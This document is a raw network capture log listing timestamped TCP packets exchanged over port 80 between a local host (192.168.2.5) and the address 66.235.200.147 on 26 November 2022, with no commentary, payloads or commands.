Nov 26, 2022 11:17:42.578433990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578433990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578445911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578453064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578464985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578480005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578619957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578639984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578660011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578677893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578692913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578723907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578728914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578728914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579123974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579171896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579237938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579257965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579304934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579308033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579327106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579345942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579361916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579365969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579385996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579405069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579418898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579451084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579483986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579502106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579566002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579567909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579586983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579605103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579616070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579648018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579694033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579713106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579730988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579749107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579770088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579770088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579787970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579793930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579895973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579915047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.579946995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.579984903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.580604076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.580761909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.580843925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.580843925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.580862999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.580903053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.580924034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581008911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581027985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581046104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581063032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581082106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581089020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581119061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581156969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581176043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581193924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581222057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581259966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581279039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581342936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581366062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581383944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581402063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581437111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581449032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581465006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581468105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581486940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581513882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581532955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581551075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581573009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581641912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581696033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581741095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581758976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581841946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581867933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581887007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581901073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581943989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.581943989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581964016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.581981897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582000971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582006931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582020044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582026958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582039118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582058907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582077980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582092047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582101107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582119942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582122087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582139015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582139015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582156897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582175016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582195044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582206964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582214117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582231998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582236052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582250118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582258940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582307100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582324982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582344055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582355022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582364082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582376957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582417011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582513094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582531929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582720041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582737923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582756996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582799911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582799911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582833052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582850933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582868099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582897902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.582905054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582926035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.582948923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583164930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583184004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583214045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583290100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583368063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583400011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583419085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583436966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583456993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583465099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583484888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583503962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583522081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583539963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583611965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583623886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583642960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583661079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583678961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583729982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583733082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583751917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583770037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583811045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583849907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583868027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583887100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583904982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583920002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583923101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583941936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583960056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583971977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583971977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.583978891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.583997965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584001064 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584017038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584064007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584068060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584081888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584100962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584139109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584172010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584189892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584203005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584207058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584225893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584228992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584273100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584290981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584315062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584342957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584513903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584532022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584549904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584577084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584736109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584753990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584780931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584860086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584877968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584897041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584913015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.584966898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.584985971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585005999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585016966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585024118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585045099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585076094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585103035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585120916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585139036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585158110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585169077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585177898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585196018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585213900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585216999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585233927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585239887 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585253000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585272074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585277081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585290909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585306883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585310936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585330009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585350037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585367918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585371971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585387945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585391045 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585407019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585423946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585424900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585443974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585463047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585481882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585488081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585500002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585506916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585517883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585536003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585541964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585553885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585572004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585573912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585589886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585608959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585628033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585628986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585644960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585654974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585664034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585683107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585688114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585700035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585719109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585736990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585736990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585756063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585762978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585774899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585792065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585798979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585812092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585830927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585848093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585850000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585875034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585879087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585897923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585915089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585916042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585936069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585953951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585973024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585974932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.585993052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.585999012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586010933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586029053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586034060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586045980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586061954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586064100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586082935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586102009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586118937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586118937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586138964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586143970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586157084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586175919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586182117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586193085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586210966 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586216927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586230040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586249113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586266041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586272001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586282969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586293936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586301088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586318970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586322069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586337090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586354971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586365938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586374044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586391926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586400032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586409092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586415052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586427927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586440086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586447954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586466074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586467028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586486101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586503983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586507082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586523056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586539030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586540937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586559057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586576939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586595058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586596012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586615086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586620092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586632967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586652040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586654902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586671114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586702108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586719036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.586786032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586805105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586824894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.586843014 CET	80	49707	66.235.200.147	192.168.2.5
